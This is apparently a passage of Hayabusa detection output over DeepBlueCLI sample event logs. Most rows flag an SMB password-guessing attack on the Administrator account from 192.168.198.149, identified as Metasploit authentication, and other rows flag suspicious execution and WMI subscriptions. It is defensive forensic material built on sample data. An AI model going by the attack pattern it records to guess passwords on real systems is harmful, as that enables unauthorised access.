10552016-09-15 11:13:19.927 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10562016-09-15 23:50:14.730 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10572016-09-15 23:50:14.730 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10582016-09-16 05:09:55.941 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10592016-09-16 05:09:55.941 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10602016-09-18 07:53:42.819 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10612016-09-18 07:53:42.819 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10622016-09-18 07:56:46.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10632016-09-18 07:56:47.728 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10642016-09-18 07:56:47.728 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10652016-09-18 08:03:40.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10662016-09-18 08:03:40.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10672016-09-19 23:56:52.427 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10682016-09-19 23:56:52.427 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10692016-09-19 23:57:15.380 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10702016-09-19 23:57:15.380 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10712016-09-20 00:13:04.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10722016-09-20 00:13:05.415 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10732016-09-20 00:13:05.415 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10742016-09-20 00:15:08.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10752016-09-20 00:15:08.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10762016-09-20 01:34:31.100 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10772016-09-20 01:50:06.477 +09:00DESKTOP-M5SN04R4625informationalLogon Failure - Username does not existUser: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10782016-09-20 01:50:06.477 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10792016-09-20 01:50:06.513 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10802016-09-20 01:50:06.513 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10812016-09-20 01:50:06.513 +09:00--mediumPassword Guessing Attack[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5mrules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml-
10822016-09-20 01:50:06.588 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10832016-09-20 01:50:06.588 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10842016-09-20 01:50:06.637 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10852016-09-20 01:50:06.637 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10862016-09-20 01:50:06.680 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10872016-09-20 01:50:06.680 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10882016-09-20 01:50:06.725 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10892016-09-20 01:50:06.725 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10902016-09-20 01:50:06.773 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10912016-09-20 01:50:06.773 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10922016-09-20 01:50:06.816 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10932016-09-20 01:50:06.816 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10942016-09-20 01:50:06.869 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10952016-09-20 01:50:06.869 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10962016-09-20 01:50:06.909 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10972016-09-20 01:50:06.909 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10982016-09-20 01:50:06.977 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
10992016-09-20 01:50:06.977 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11002016-09-20 01:50:07.008 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11012016-09-20 01:50:07.008 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11022016-09-20 01:50:07.052 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11032016-09-20 01:50:07.052 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11042016-09-20 01:50:07.091 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11052016-09-20 01:50:07.091 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11062016-09-20 01:50:07.136 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11072016-09-20 01:50:07.136 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11082016-09-20 01:50:07.169 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11092016-09-20 01:50:07.169 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11102016-09-20 01:50:07.217 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11112016-09-20 01:50:07.217 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11122016-09-20 01:50:07.262 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11132016-09-20 01:50:07.262 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11142016-09-20 01:50:07.297 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11152016-09-20 01:50:07.297 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11162016-09-20 01:50:07.343 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11172016-09-20 01:50:07.343 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11182016-09-20 01:50:07.393 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11192016-09-20 01:50:07.393 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11202016-09-20 01:50:07.444 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11212016-09-20 01:50:07.444 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11222016-09-20 01:50:07.484 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11232016-09-20 01:50:07.484 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11242016-09-20 01:50:07.520 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11252016-09-20 01:50:07.520 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11262016-09-20 01:50:07.551 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11272016-09-20 01:50:07.551 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11282016-09-20 01:50:07.590 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11292016-09-20 01:50:07.590 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11302016-09-20 01:50:07.631 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11312016-09-20 01:50:07.631 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11322016-09-20 01:50:07.663 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11332016-09-20 01:50:07.663 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11342016-09-20 01:50:07.684 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11352016-09-20 01:50:07.684 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11362016-09-20 01:50:07.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11372016-09-20 01:50:07.720 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11382016-09-20 01:50:07.752 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11392016-09-20 01:50:07.752 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11402016-09-20 01:50:07.796 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11412016-09-20 01:50:07.796 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11422016-09-20 01:50:07.835 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11432016-09-20 01:50:07.835 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11442016-09-20 01:50:07.929 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11452016-09-20 01:50:07.929 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11462016-09-20 01:50:07.972 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11472016-09-20 01:50:07.972 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11482016-09-20 01:50:08.000 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Unknown ReasonUser: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11492016-09-20 01:50:08.000 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11502016-09-20 01:50:08.042 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Unknown ReasonUser: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11512016-09-20 01:50:08.042 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11522016-09-20 01:50:08.179 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11532016-09-20 01:50:08.179 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11542016-09-20 01:50:08.219 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11552016-09-20 01:50:08.219 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11562016-09-20 01:50:08.335 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
11572016-09-20 01:50:08.335 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
